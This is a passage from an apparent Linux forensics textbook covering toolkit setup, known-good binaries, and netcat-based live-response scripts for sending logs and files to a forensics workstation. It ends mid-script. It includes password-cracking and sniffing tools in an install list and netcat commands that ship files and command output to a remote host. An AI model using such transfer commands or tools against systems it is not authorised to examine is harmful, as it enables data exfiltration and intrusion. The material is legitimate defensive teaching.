cryptsetup

dc3dd

dconf-tools

dumbpig

e2fslibs-dev

ent

epic5

etherape

exif

extundelete

f-spot

fdupes

flare

flasm

flex

foremost

g++

gcc

gdb

ghex

gthumb

graphviz

hexedit

htop

hydra

hydra-gtk

ipython

kdiff3

kpartx

libafflib0

libafflib-dev

libbde

libbde-tools

libesedb

libesedb-tools

libevt

libevt-tools

libevtx

libevtx-tools

libewf

libewf-dev

libewf-python

libewf-tools

libfuse-dev

libfvde

libfvde-tools

liblightgrep

libmsiecf

libnet1

libolecf

libparse-win32registry-perl

libregf

libregf-dev

libregf-python

libregf-tools

libssl-dev

libtext-csv-perl

libvshadow

libvshadow-dev

libvshadow-python

libvshadow-tools

libxml2-dev

maltegoce

md5deep

nbd-client

netcat

netpbm

nfdump

ngrep

ntopng

okular

openjdk-6-jdk

p7zip-full

phonon

pv

pyew

python

python-dev

python-pip

python-flowgrep

python-nids

python-ntdsxtract

python-pefile

python-plaso

python-qt4

python-tk

python-volatility

pytsk3

rsakeyfind

safecopy

sleuthkit

ssdeep

ssldump

stunnel4

tcl

tcpflow

tcpstat

tcptrace

tofrodos

torsocks

transmission

unrar

upx-ucl

vbindiff

virtuoso-minimal

winbind

wine

wireshark

xmount

zenity

regripper

cmospwd

ophcrack

ophcrack-cli

bkhive

samdump2

cryptcat

outguess

bcrypt

ccrypt

readpst

ettercap-graphical

driftnet

tcpreplay

tcpxtract

tcptrack

p0f

netwox

lft

netsed

socat

knocker

nikto

nbtscan

radare-gtk

python-yara

gzrt

testdisk

scalpel

qemu

qemu-utils

gddrescue

dcfldd

vmfs-tools

mantaray

python-fuse

samba

open-iscsi

curl

git

system-config-samba

libpff

libpff-dev

libpff-tools

libpff-python

xfsprogs

gawk

exfat-fuse

exfat-utils

xpdf

feh

pyew

radare

radare2

pev

tcpick

pdftk

sslsniff

dsniff

rar

xdot

ubuntu-tweak

vim"
# actually install
# first update
apt-get update
for pkg in ${pkglist}
do
  if (dpkg --list | awk '{print $2}' | egrep "^${pkg}$" 2>/dev/null) ;
  then
    echo "yeah ${pkg} already installed"
  else
    # try to install
    echo -n "Trying to install ${pkg}..."
    if (apt-get -y install ${pkg} 2>/dev/null) ; then
      echo "+++ Succeeded +++"
    else
      echo "--- FAILED ---"
    fi
  fi
done

Briefly, the above script works as described here. First, we run a particular shell (bash) using the special comment construct #!{command to run}. This is often called the “she-bang” operator or “pound-bang” or “hash-bang.” Second, the lines with the echo statements add two repositories to our list of software sources. Technically, these repositories are intended to be used with Ubuntu 14.04, but they are likely to work with newer versions of Ubuntu and/or Debian as well.

Third, a variable named pkglist is created which contains a list of the tools we wish to install. Fourth, we update our local application cache by issuing the command apt-get update. Finally, we iterate over our list of packages stored in pkglist and install them if they aren’t already installed. The test involves a string of commands, dpkg --list | awk '{print $2}' | egrep "^${pkg}$" 2>/dev/null. The command dpkg --list lists all installed packages and this list is then passed to awk '{print $2}' which causes the second word (the package name) to be printed; this is in turn passed to egrep "^${pkg}$" 2>/dev/null which checks to see if the package name exactly matches one that is installed (the ^ matches the start and $ matches the end). Any errors are sent to the null device because we only care if there were any results.
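The exact-match test can be tried on its own without touching the package database. What follows is only a sketch: is_listed and sample_list are hypothetical helper names, and the sample data stands in for the output of dpkg --list | awk '{print $2}'. It swaps the anchored regular expression for grep with -F and -x (literal, whole-line matching), which gives the same exact-match behavior and should also cope with names that contain regular expression characters, such as the + in g++.

```shell
# is_listed NAME: succeed if NAME appears as a complete line on stdin.
# (is_listed is a hypothetical helper name, not part of the install script.)
is_listed() {
    # -F: treat NAME as a literal string
    # -x: match whole lines only (same effect as ^...$)
    # -q: print nothing, just set the exit status
    grep -F -x -q -- "$1"
}

# Sample data standing in for: dpkg --list | awk '{print $2}'
sample_list() {
    printf '%s\n' vim vim-tiny g++ gcc
}
```

For example, sample_list | is_listed vim succeeds, while sample_list | is_listed vi fails because vi is only part of a longer name.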

A set of known good system binaries should be installed to a flash drive in order to facilitate live response. At a minimum you will want the /bin, /sbin, and /lib directories (/lib32 and /lib64 for 64-bit systems) from a known good system. You may also want to grab the /usr directory or at least /usr/local/, /usr/bin, and /usr/sbin. Most Linux systems you are likely to encounter are running 64-bit versions of Linux; after all, 64-bit Linux has been available since before 64-bit processors were commercially available. It might still be worth having a 32-bit system on hand.

On occasion a live Linux system installed on a bootable USB drive could be useful. Either a distribution such as SIFT can be installed by itself on a drive or the live system can be installed on the first partition of a larger USB drive and the system binaries installed on a second partition. If you are using a USB drive with multiple partitions it is important to know that Windows systems will only see the first partition and then only if it is formatted as FAT or NTFS. Partitions containing system binaries should be formatted as EXT2, EXT3, or EXT4 in order to mount them with correct permissions. Details of how to mount these system binaries will be provided in future chapters.

THIS IS TAKING TOO LONG

Running live Linux in a virtual machine

If you decide to create a bootable SIFT (or similar) USB drive you will quickly find that it takes hours to install the packages from SIFT. This can tie up your computer for hours, preventing you from getting any real work done. There is a way to build the USB drive without tying up the machine, however. What you need to do is set up a virtual machine that can be run from a live Linux distribution on a USB drive. The following instructions assume you are running VirtualBox on a Linux host system.

VirtualBox ships with several tools. One of these is called vboxmanage. There are several commands vboxmanage supports. Typing vboxmanage --help in a terminal will give you a long list of commands. This will not list the command that we need, however, as it is one of the internal commands.

In order to create a virtual disk that points to a physical device you must execute the following command as root: vboxmanage internalcommands createrawvmdk -filename <location of vmdk file> -rawdisk <USB device>. For example, if your thumb drive is normally assigned to /dev/sdb the following command could be used: vboxmanage internalcommands createrawvmdk -filename /root/VirtualBox\ Vms/usb.vmdk -rawdisk /dev/sdb. Note that you cannot just sudo this command as the regular user will have permission problems trying to run the virtual machine later. Creating this virtual drive and running VirtualBox is shown in Figure 1.3.

Once the virtual disk file has been created, set up a new virtual machine in the normal manner. Depending on the live Linux you have chosen, you may need to enable EFI support as shown in Figure 1.7. The creation of the live Linux virtual machine is shown in Figure 1.4 through Figure 1.6. The virtual machine running for the first time is shown in Figure 1.8.

FIGURE 1.3

Creating a virtual disk file that points to a physical USB drive.

FIGURE 1.4

Creating a virtual machine that runs a live Linux distribution from a USB drive.

FIGURE 1.5

Setting up memory for the live Linux virtual machine. Be certain to select the maximum amount of memory for better performance running a live distribution as everything is run from RAM.

FIGURE 1.6

Selecting the USB physical drive for the live Linux virtual machine.

FIGURE 1.7

Enabling EFI support in VirtualBox.

FIGURE 1.8

Running a virtual machine from a USB drive.

SUMMARY

In this chapter we have discussed all the preliminary items that should be taken care of before arriving on the scene after a suspected incident has occurred. We covered the hardware, software, and other tools that should be in your go bag. In the next chapter we will discuss the first job when you arrive, determining if there was an incident.

CHAPTER 2

Determining If There Was an Incident

INFORMATION IN THIS CHAPTER:

Opening a case
Talking to users
Documentation
Mounting known-good binaries
Minimizing disturbance to the subject system
Using scripting to automate the process
Collecting volatile data

OPENING A CASE

This chapter will address the highlighted box from our high-level process as shown in Figure 2.1. We will come to learn that there is often much involved in determining whether or not there was an incident. We will also see that some limited live response may be necessary in order to make this determination.

FIGURE 2.1

The High-level Investigation Process.

Before you do anything else, when you arrive on the scene, you should open a case file. This is not as complicated as it sounds. You could literally create a folder on your laptop with a case number. What should you use for a case number? Whatever you want. You might want a case number that is a year-number or you might prefer to use the date for a case number under the assumption that you won’t be starting multiple cases on the same day. You could always append a number to the date if you had multiple cases in a given day.
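The date-plus-counter idea can be sketched in a few lines of shell. This is only an illustration of one possible naming scheme; new_case_dir is a hypothetical helper and the YYYY-MM-DD format is an assumption, not a convention used elsewhere in this book.

```shell
# new_case_dir BASE: create and print a case folder named after today's date.
# If BASE/YYYY-MM-DD already exists, a counter is appended (-2, -3, ...).
# (new_case_dir and the naming scheme are illustrative assumptions.)
new_case_dir() {
    base=${1:-.}
    day=$(date +%Y-%m-%d)
    dir="$base/$day"
    n=1
    # keep bumping the counter until an unused name is found
    while [ -e "$dir" ]; do
        n=$((n + 1))
        dir="$base/$day-$n"
    done
    mkdir -p "$dir" && printf '%s\n' "$dir"
}
```

Calling new_case_dir ~/cases twice on the same day would create one folder named after the date and a second one with -2 appended.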

You might also consider starting a new entry in your bound notebook (with the numbered pages). Some might prefer to wait until they are sure there was an incident before consuming space in their notebooks for a false alarm. My personal feeling on this is that notebooks are cheap and it is easier and cleaner if you start taking notes in one place from the very beginning.

TALKING TO USERS

Before you ever think about touching the subject system you should interview the users. Why? Because they know more about the situation than you will. You might be able to determine that it was all a false alarm very quickly by talking to the users. For example, perhaps it was a system administrator that put a network card in promiscuous mode and not malware or an attacker. It would be far better for everyone if you found this out by talking to the administrator now than after hours of investigating.

You should ask the users a series of questions. The first question you might ask is, “Why did you call me?” Was there an event that led to your being called in? Does the organization lack a qualified person to perform the investigation? Does the organization’s policy on possible incidents require an outside investigator?

The second question you might ask is, “Why do you think there is a problem or incident?” Did something strange happen? Is the network and/or machine slower than normal? Is there traffic on unusual ports? Unlike Windows users, most Linux users don’t just shrug off strange behavior and reboot.

Next you want to get as much information as you can about the subject (suspected victim) system. What is the system normally used for? Where did the system come from? Was it purchased locally or online, etc.? As many readers are likely aware, it has come to light that certain government entities are not above planting parasitic devices inside a computer that has been intercepted during shipment. Has the computer been repaired recently? If so, by whom? Was it an old, trusted friend or someone new? Malicious software and hardware are easily installed during such repairs.

DOCUMENTATION

As previously mentioned, you cannot overdo the documentation. You should write down what the users told you during your interviews. In addition to the advantages already mentioned for using a notebook, writing notes in your notebook is a lot less distracting and intimidating for the users than banging away at your laptop keyboard or, even worse, filming the interviews.

You should also write down everything you know about the subject system. If it seems appropriate you might consider taking a picture of the computer and screen. If you suspect that physical security has been breached, it is an especially good idea. You are now ready to actually touch the subject system.

VIRTUAL COMPLICATIONS

If you are using a virtual machine, older may be better

I have previously recommended the use of a USB 3.0 drive for performance reasons. If you are using a virtual machine to practice while you are going through this book, a USB 2.0 drive might be preferred. The reason for this is that some of the virtualization software seems to have issues dealing with USB 3.0 devices. At the time of this writing USB 2.0 devices seem to cause fewer problems.

Regardless of the type of drive you have, the host operating system will initially try to lay claim to any attached device. If you are using VirtualBox, you will need to check the appropriate device from the USB Devices submenu under Devices as shown in Figure 2.2.

FIGURE 2.2

Selecting a USB Drive. If your subject system is running inside a virtual machine you will need to pass the device along to the virtual machine by selecting the device as shown here.

MOUNTING KNOWN-GOOD BINARIES

In most cases if you insert your USB drive with known-good binaries, it will be automounted. If this isn’t the case on the subject system, you will need to manually mount the drive. Once your drive is mounted you should run a known-good shell located on your drive. You are not done after you run this shell, however. You must set your path to only point at the directories on your USB drive and also reset the LD_LIBRARY_PATH variable to only reference library directories on the USB drive.

The first thing you will want to do is to check that your filesystem has in fact been mounted. Some versions of Linux will not automatically mount an extended (ext2, ext3, or ext4) filesystem. Most Linux systems will automount a FAT or NTFS filesystem, however. Recall that your system binaries must be housed on an extended filesystem in order to preserve their permissions. The easiest way to check if something is mounted is to execute the mount command. The results of running this command with my Linux forensics response drive are shown in Figure 2.3. Notice that my drive is mounted as /dev/sdb with three partitions. The first two partitions are a FAT and ext4 partition for a live version of Linux (SIFT in this case) and the third partition contains 64-bit system binaries.

FIGURE 2.3

Verifying That a USB Drive Is Mounted. In this figure the three highlighted partitions from the USB drive (/dev/sdb) have all been automatically mounted.
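If you would rather not read through the full output of mount, the same check can be sketched as a small function. This is an assumption-laden illustration: is_mounted is a hypothetical helper, and it reads /proc/mounts (the kernel's list of mounted filesystems on Linux) rather than parsing the output of the mount command.

```shell
# is_mounted DEVICE [MOUNTS_FILE]: succeed if DEVICE is listed as mounted.
# MOUNTS_FILE defaults to /proc/mounts; the optional argument exists only so
# the function can be tried against a saved copy. (Hypothetical helper name.)
is_mounted() {
    # the first field of each line is the device; exit 0 only on an exact match
    awk -v dev="$1" '$1 == dev { found = 1 } END { exit !found }' "${2:-/proc/mounts}"
}
```

For example, is_mounted /dev/sdb3 && echo "response drive is mounted" would print the message only when the third partition is mounted. The device name /dev/sdb3 is taken from the figure and will differ on other systems.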

If you are unsure what drive letter will be assigned to your incident response drive the dmesg command can often help. The results of running dmesg after inserting a USB drive are shown in Figure 2.4. The portion that demonstrates the drive has been assigned to /dev/sdb is highlighted.

FIGURE 2.4

Result of running dmesg command. The portion that shows drive letter /dev/sdb has been assigned is highlighted.

If you need to manually mount your drive, first create a mount destination by running sudo mkdir /mnt/{destination}, e.g. sudo mkdir /mnt/good-bins or similar. Now that a destination exists the drive can be mounted using sudo mount /dev/{source partition} /mnt/{destination}, e.g. sudo mount /dev/sdb1 /mnt/good-bins.

Once everything is mounted change to the root directory for your known-good binaries and then run bash by typing exec bin/bash as shown in Figure 2.5. Once the known-good shell is loaded the path must be reset to only point to the response drive by running export PATH=$(pwd)/sbin:$(pwd)/bin as shown in Figure 2.6. Here we are using a shell trick. If you enclose a command in parentheses that are preceded by a $ the command is run and the results are substituted. Finally, the library path must also be set to point to known-good library files by running export LD_LIBRARY_PATH=$(pwd)/lib64:$(pwd)/lib as shown in Figure 2.7. If you have also copied some of the directories under /usr (recommended) then these paths should also be included in the PATH and LD_LIBRARY_PATH.

FIGURE 2.5

Executing the known-good bash shell.

FIGURE 2.6

Making the path point to known-good binaries.

FIGURE 2.7

Making the library path point to known-good files.
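When directories under /usr have also been copied to the response drive, typing the two export commands by hand gets tedious. The following is a minimal sketch of one way to build them. The helper name known_good_paths is hypothetical, and the list of candidate directories is an assumption based on the directories named in this chapter. It only prints the export lines so they can be reviewed before use.

```shell
# known_good_paths ROOT: print export lines for PATH and LD_LIBRARY_PATH that
# reference only directories that exist under ROOT (the response drive).
# (known_good_paths is a hypothetical helper; directory names follow the text.)
known_good_paths() {
    root=$1
    path=""
    libs=""
    for d in sbin bin usr/sbin usr/bin usr/local/bin; do
        if [ -d "$root/$d" ]; then
            path="${path:+$path:}$root/$d"   # add ":" only between entries
        fi
    done
    for d in lib64 lib lib32 usr/lib64 usr/lib; do
        if [ -d "$root/$d" ]; then
            libs="${libs:+$libs:}$root/$d"
        fi
    done
    printf 'export PATH="%s"\n' "$path"
    printf 'export LD_LIBRARY_PATH="%s"\n' "$libs"
}
```

From the root directory of the known-good binaries, known_good_paths "$(pwd)" shows the two lines. They can then be typed in, or applied with eval "$(known_good_paths "$(pwd)")" provided the mount point contains no quote or dollar characters.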

MINIMIZING DISTURBANCE TO THE SUBJECT SYSTEM

Unfortunately, it is impossible to collect all the data from a running system without causing something to change. Your goal as a forensic investigator should be to minimize this disturbance to the subject system. There are two things you should never do if you can avoid it. First, do not install anything on the subject system. If you install new software it will substantially change the system when configuration files, libraries, and executables are saved to the subject’s media. The worst possible situation would be to compile something from source code as it will cause many temporary files to be created and will also consume memory (possibly pushing out other more interesting information) and affect a memory image should you choose to make one.

The second thing you should avoid is creating new files on the system. If you must use a tool that is not installed, have it on your response USB drive. Don’t create memory or disk images and then store them on the subject system either!

You will definitely alter what is in RAM when you investigate a system. You should try to minimize your memory footprint, however. There are a couple of ways that you might accomplish these goals. Two popular solutions are to store data on USB media (which could be your response drive) or to use the netcat utility.

Using a USB drive to store data

Attaching a USB drive to the subject system is minimally invasive. This will cause some new entries in a few temporary pseudo filesystems such as /proc and /sys and the creation of a new directory under /media on most versions of Linux. A few larger USB 3.0 backup drives should be in your toolkit for just such occasions. It might be best to copy your system binaries to this drive first should you end up going this route to avoid having to mount more than one external drive.

Once the USB drive has been attached you can use the techniques described earlier to operate with known-good system binaries and utilities. Log files and other data discussed in this chapter can be stored to the USB drive. Techniques described in later chapters can be used to store images on the USB drive. Even if you used the netcat utility (described next), having some USB backup drives on hand can make sharing images much easier. Naturally, whatever you do should be documented in your bound notebook.

Using Netcat

While using a USB drive meets our goals of not installing anything or creating new files on the subject system (with the exceptions noted above) it does not minimize our memory footprint. Copying to slow USB storage devices (especially USB 2.0 drives) is likely to result in a significant amount of caching which will increase our memory footprint. For this reason, the use of netcat is preferred when the subject system is connected to a network of reasonable speed and reliability.

Wired gigabit Ethernet is the most desirable medium. If you are forced to use wireless networking, do your best to ensure your forensics workstation has a strong signal from the access point. If neither of these is an option, you may be able to connect your forensics laptop directly to the subject system via a crossover cable.

Realize that the subject system is probably set up to use Dynamic Host Configuration Protocol (DHCP) so you will either need to use static IP addresses on both ends or install a DHCP server on your forensics laptop if you go the crossover cable route. If the subject system has only one network interface that must be disconnected I recommend against using the crossover cable as it will disturb the system too much. To temporarily set up a static IP on each end of your crossover cable issue the command sudo ifconfig {interface} down && sudo ifconfig {interface} {IP} netmask {netmask} up, e.g. sudo ifconfig eth0 down && sudo ifconfig eth0 192.168.1.1 netmask 255.255.255.0 up. Make sure you give each end a different IP on the same subnet!

Setting up a netcat listener

You will need to set up one or more listeners on the forensics workstation. The syntax for setting up a listener is pretty simple. Typing netcat -l {port} will cause a listener to be created on every network interface on the machine. Normally this information should be stored in a file by redirecting netcat’s output using > or >>. Recall that the difference between > and >> is that > causes an existing file to be overwritten and >> appends data if the file already exists.
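The difference between the two redirection operators is easy to see with a throwaway file. The function below is only a demonstration; demo_redirect is a hypothetical name and plain echo stands in for the netcat listener.

```shell
# demo_redirect FILE: write FILE twice with > and then once with >>,
# so the difference between overwriting and appending is visible.
demo_redirect() {
    echo "first"  >  "$1"   # creates (or truncates) the file
    echo "second" >  "$1"   # overwrites: "first" is gone
    echo "third"  >> "$1"   # appends: the file now holds "second" and "third"
}
```

This is why a log file that is written to by several separate commands should be opened with >>. Using > for each one would keep only the last entry.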

I recommend that you create a listener on the forensics workstation that receives the output of all the commands you wish to run on the subject system in a single log file. This keeps everything in one place. By default netcat will terminate the listener upon receiving the end-of-file (EOF) marker. The -k option for netcat will keep the listener alive until you press Control-C in the terminal where you started netcat. The command to start the log file listener is netcat -k -l {port} >> {log file}, e.g. netcat -k -l 9999 >> example-log.txt. This command is shown in Figure 2.8. Note that while I have used netcat here this is a symbolic link to the same program pointed to by nc on most systems, so you can use whichever you prefer.

FIGURE 2.8

Running a netcat listener on the forensics workstation.

Sending data from the subject system

Now that you have a listener on the forensics workstation it is easy to send data across the network using netcat. The general sequence for sending something for logging is {command} | nc {forensic workstation IP} {port}. For commands that do not have output that makes it obvious what was run you might want to send a header of sorts using the echo utility before sending the output of the command. This is demonstrated in Figure 2.9. The results of running the commands shown in Figure 2.9 are shown in Figure 2.10. Using scripting to automate this process is discussed later in this chapter.

FIGURE 2.9

Using netcat to send information to the forensics workstation.

FIGURE 2.10

Results received by listener from commands in Figure 2.9.

Sending files

It is not unusual to extract suspicious files from a subject system for further study. Netcat is also handy for performing this task. In order to receive a file you should start a new listener on the forensics workstation that doesn’t use the -k option. In this case you want to end the listener after the file has been transmitted. The command is nc -l {port} > {filename}.

On the subject system the suspect file is redirected into the netcat talker. The syntax for sending the file is nc {forensic workstation IP} {port} < {filename}, e.g. nc 192.168.1.119 4444 < /bin/bash. The listener and talker for this file transfer are shown in Figure 2.11 and Figure 2.12, respectively.

FIGURE 2.11

Setting up a netcat listener to receive a file.

FIGURE 2.12

Using netcat to send a file.

USING SCRIPTING TO AUTOMATE THE PROCESS

It should be fairly obvious that our little netcat system described above is ripe for scripting. The first question one might ask is what sort of scripting language should be used. Many would immediately jump to using Python for this task. While I might like to use Python for many forensics and security tasks, it is not the best choice in this case.

There are a couple of reasons why shell scripting is a better choice, in my opinion. First, we want to minimize our memory footprint, and executing a Python interpreter runs counter to that goal. Second, a Python script that primarily just runs other programs is somewhat pointless. It is much simpler to execute these programs directly in a shell script. As an additional bonus for some readers, the scripts described here constitute a nice introduction to basic shell scripting.

Scripting the server

The scripts shown below will create a new directory for case files and start two listeners. The first listener is used to log commands executed on the subject (client) machine and the second is used to receive files. A script to clean up and shut down the listeners is also presented. Here is the main script, start-case.sh:

#!/bin/bash
#
# start-case.sh
#
# Simple script to start a new case on a forensics
# workstation. Will create a new folder if needed
# and start two listeners: one for log information
# and the other to receive files. Intended to be
# used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
  echo "usage: $0 <case number>"
  echo "Simple script to create case folder and start listeners"
  exit 1
}

if [ $# -lt 1 ] ; then
  usage
else
  echo "Starting case $1"
fi

# if the directory doesn't exist create it
if [ ! -d $1 ] ; then
  mkdir $1
fi

# create the log listener
`nc -k -l 4444 >> $1/log.txt` &
echo "Started log listener for case $1 on $(date)" | nc localhost 4444

# start the file listener
`./start-file-listener.sh $1` &

This script starts with the special comment “#!” also known as the she-bang which causes the bash shell to be executed. It is important to run a particular shell as users who are allowed to pick their own might select something incompatible with your script. A # anywhere on a line begins a comment which terminates at the end of the line. The first several lines are comments that describe the script.

After the comments a function called usage is defined. To define a function in a shell script simply type its name followed by a space, empty parentheses, another space, and then enclose whatever commands make up the function in curly brackets. Unlike compiled languages and some scripting languages, shell scripts require white space in the proper places or they will not function correctly. The $0 in the line echo "usage: $0 <case number>" is a variable that is set to the first command line parameter that was used to run the script, which is the name of the script file.

Note the use of double quotes in the echo commands. Anything enclosed in double quotes is expanded (interpreted) by the shell. If single quotes are used, no expansion is performed. It is considered a good programming practice to define a usage function that is displayed when a user supplies command line arguments that do not make sense.
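The effect of the two kinds of quotes is easiest to see side by side. In this small sketch the function name show_quotes and the case number are made up for illustration.

```shell
# show_quotes: print the same text with double and then single quotes.
show_quotes() {
    case_name="2015-07-001"            # illustrative value
    echo "Starting case $case_name"    # double quotes: the variable is expanded
    echo 'Starting case $case_name'    # single quotes: printed literally
}
```

The first echo prints the case number, while the second prints the characters $case_name exactly as typed.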

The line if [ $# -lt 1 ] ; then begins an if block. The logical test is enclosed in square brackets. Note that there must be white space around the brackets and between parts of the logical test as shown. The variable $# is set to the number of command line arguments passed in to the script. In this script if that number is less than 1, the usage function is called, otherwise a message about starting a case is echoed to the screen. The variable $1 is the first command line parameter passed in (right after the name of the script) which is meant to be the case name. Observe that the if block is terminated with fi (if spelled backwards).

The conditional statement in the if block that starts with if [ ! -d $1 ] ; then checks to see if the case directory does not yet exist. The -d test checks to see that a directory with the name that follows exists. The ! negates (reverses) the test so that the code inside the if block is executed if the directory doesn’t exist. The code simply uses mkdir to create the directory.
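The argument count check and the directory test can be combined into one reusable function. This is a sketch rather than part of start-case.sh: ensure_case_dir is a hypothetical name, and the one deliberate difference from the script is that $1 is wrapped in double quotes so that a case name containing spaces is treated as a single directory name.

```shell
# ensure_case_dir NAME: create directory NAME unless it already exists.
# Returns 2 when no name is given. (Hypothetical helper, not from the scripts.)
ensure_case_dir() {
    if [ $# -lt 1 ]; then
        echo "usage: ensure_case_dir <case name>" >&2
        return 2
    fi
    # Quoting "$1" keeps a name containing spaces in one piece.
    if [ ! -d "$1" ]; then
        mkdir "$1"
    fi
}
```

Calling ensure_case_dir "case 42" twice is harmless. The second call finds the directory and does nothing.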

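Next the line `nc -k -l 4444 >> $1/log.txt` & starts a listener on port 4444 and sends everything received to a file in the case directory named log.txt. Note the command is enclosed in backticks (backward single quotes). This tells the shell to run the command and substitute its output. Because the listener’s output is redirected to the log file there is nothing left to substitute, so the net effect is simply that the command runs. The & causes the command to be run in the background so that more things may be executed.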
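Background execution can be explored safely with a command that does nothing but wait. The sketch below uses sleep in place of the netcat listener. The function name run_in_background is hypothetical, and recording the process ID from $! is an optional extra that the scripts in this chapter do not use.

```shell
# run_in_background: start a short job with &, remember its PID from $!,
# keep working, then collect the job's exit status with wait.
run_in_background() {
    sleep 1 &                 # & returns control to the script immediately
    job_pid=$!                # $! holds the PID of the most recent background job
    echo "foreground continues while $job_pid runs" >&2
    wait "$job_pid"           # block until the background job finishes
}
```

Saving the PID in this way would allow a single listener to be stopped later with kill instead of stopping every process with the same name.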

The next line simply echoes a banner which is piped to the listener in order to create a header for the log file. Finally, another script is also run in the background. This script starts the file listener process. This script is described next.

#!/bin/bash
#
# start-file-listener.sh
#
# Simple script to start a new file
# listener. Intended to be
# used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

# When a filename is sent to port 5555 a transfer on 5556
# is expected to follow.

usage () {
  echo "usage: $0 <case name>"
  echo "Simple script to start a file listener"
  exit 1
}

# did you specify a case name?
if [ $# -lt 1 ] ; then
  usage
fi

while true
do
  filename=$(nc -l 5555)
  nc -l 5556 > $1/$(basename $filename)
done

This script starts with the standard she-bang which causes the bash shell to be used. It also defines a usage function which is called if a case name is not passed in to the script. The real work in this script is in the while loop at the end. The line while true causes an infinite loop which is only exited when the user presses Control-C or the process is killed. Note that unlike the if block which is terminated with fi, the do block is terminated with done (not od).

The first line in the loop runs a netcat listener on port 5555 and sets the filename variable equal to whatever was received on this port. Recall that we have used this trick of running a command inside of $() to set a variable equal to the command results in the previous script. Once a filename has been received a new listener is started on port 5556 (nc -l 5556 on the next line) and the results directed to a file with the same name in a directory named after the case name (> $1/$(basename $filename) on the second half of the line). The first command line argument, which should be the case name, is stored in $1. The basename command is used to strip away any leading path for a file that is sent.
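The role of basename is easier to appreciate by looking at where a received file would end up. In this sketch local_name is a hypothetical helper that only prints the destination path. It does not receive anything.

```shell
# local_name CASE_DIR SENT_NAME: print where a received file would be stored.
# basename drops any directory part, so "/bin/bash" lands in CASE_DIR/bash
# rather than somewhere outside the case folder. (Hypothetical helper.)
local_name() {
    printf '%s/%s\n' "$1" "$(basename "$2")"
}
```

For example, local_name case42 /bin/bash prints case42/bash. Without basename the listener would try to write to case42//bin/bash, a path whose intermediate directory most likely does not exist in the case folder.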

Once a file has been received, the infinite loop starts a new listener on port 5555 and the cycle repeats itself. The loop exits when the cleanup script, to be described next, is executed. The client side scripts that send log information and files will be discussed later in this chapter.

#!/bin/bash
#
# close-case.sh
#
# Simple script to shut down listeners.
# Intended to be used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

echo "Shutting down listeners at $(date) at user request" | nc localhost 4444
killall start-case.sh
killall start-file-listener.sh
killall nc

This is our simplest script yet. First we echo a quick message to our log listener on port 4444, then we use the killall utility to kill all instances of our two scripts and netcat. If you are wondering why we need to kill netcat since it is called by the scripts, recall that in some cases it is run in the background. Also, there could be a hung or in-process netcat listener or talker out there. For these reasons it is safest just to kill all the netcat processes.

Scripting the client

Now that we have a server (the forensics workstation) waiting for us to send information, we will turn our attention toward scripting the client (subject system). Because it would be bothersome to include the forensics workstation IP address and ports with every action, we will start by setting some environment variables to be used by other client scripts. A simple script to do just that follows.

# setup-client.sh
#
# Simple script to set environment variables for a
# system under investigation. Intended to be
# used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
  echo "usage: source $0 <forensics workstation IP> [log port] [filename port] [file transfer port]"
  echo "Simple script to set variables for communication to forensics workstation"
}

# did you specify the forensics workstation IP?
if [ $# -lt 1 ] ; then
  usage
  # return rather than exit: this script is sourced, so exit
  # would close the known-good shell it is sourced into
  return 1 2>/dev/null || exit 1
fi

export RHOST=$1

if [ $# -gt 1 ] ; then
  export RPORT=$2
else
  export RPORT=4444
fi

if [ $# -gt 2 ] ; then
  export RFPORT=$3
else
  export RFPORT=5555
fi

if [ $# -gt 3 ] ; then
  export RFTPORT=$4
else
  export RFTPORT=5556
fi

Notice that there is no she-bang at the beginning of this script. Why not? Recall that you want to run your known-good version of bash, not the possibly vandalized one in the /bin directory. Another reason this script is she-bang free is that it must be sourced in order for the exported variables to be available in new processes in your current terminal. This is done by running the command source ./setup-client.sh {forensics workstation IP} in a terminal.

The script repeatedly uses the export command which sets a variable and makes it available to other processes in the current terminal or any child processes of the current terminal. Variables that are not exported are only visible within the process that created them and we create a new process each time we type bash {script name}. Setting these values would be pointless if they were never seen by the other client scripts. Since the server IP address is required, we store it in the RHOST variable. Then we check to see if any of the optional parameters were supplied; if not we export a default value, if so we export whatever the user entered.
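The visibility rule for exported variables can be checked directly. In this sketch show_export, PLAIN_VAR, and SHARED_VAR are made-up names, and a child shell started with sh -c plays the part of a client script run with bash {script name}.

```shell
# show_export: compare an exported and a non-exported variable as seen
# from a child process (here a separate sh started with -c).
show_export() {
    PLAIN_VAR=local-only          # not exported: invisible to children
    export SHARED_VAR=exported    # exported: copied into child environments
    sh -c 'echo "PLAIN_VAR=${PLAIN_VAR:-<unset>} SHARED_VAR=${SHARED_VAR:-<unset>}"'
}
```

The child reports PLAIN_VAR as unset and SHARED_VAR as exported, which is exactly why the setup script exports RHOST and the port variables.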

The following script will execute a command and send the results wrapped in a header and footer to the forensics workstation. As with the previous script, there is no she-bang and you must explicitly run the script by typing bash ./send-log.sh {command with arguments}.

# send-log.sh
#
# Simple script to send a new log entry
# to listener on forensics workstation. Intended to be
# used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

# defaults primarily for testing
[ -z "$RHOST" ] && { export RHOST=localhost; }
[ -z "$RPORT" ] && { export RPORT=4444; }

usage () {
  echo "usage: $0 <command or script>"
  echo "Simple script to send a log entry to listener"
  exit 1
}

# did you specify a command?
if [ $# -lt 1 ] ; then
  usage
else
  echo -e "++++ Sending log for $@ at $(date) ++++\n$($@)\n---end---\n" | nc $RHOST $RPORT
fi

The script starts out with a couple of lines that will set RHOST and RPORT to default values if they have not already been set. These lines demonstrate a powerful technique to use in your shell scripts known as short circuiting. The line [ -z "$RHOST" ] && { export RHOST=localhost; } consists of two statements separated by the logical AND operator. The first half tests the RHOST environment variable to see if it is zero length (null or unset). Notice that the variable, complete with the leading $, is enclosed in double quotes. This forces the shell to interpret this value as a string for the test to work as expected. If the statement doesn’t evaluate to true there is no reason to bother with the second half of the line, so it is skipped (short circuited). The curly brackets in the second half are used to explicitly group everything together in a statement.
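To try the idiom without touching the real RHOST and RPORT values, it can be wrapped in a small function. This is a sketch only; DEMO_HOST and set_default_host are hypothetical names chosen for the demonstration.

```shell
# Same default-setting idiom as in send-log.sh, applied to a throwaway
# variable (DEMO_HOST is hypothetical and unused by the response scripts).
set_default_host() {
  # The right-hand side runs only when the test on the left succeeds.
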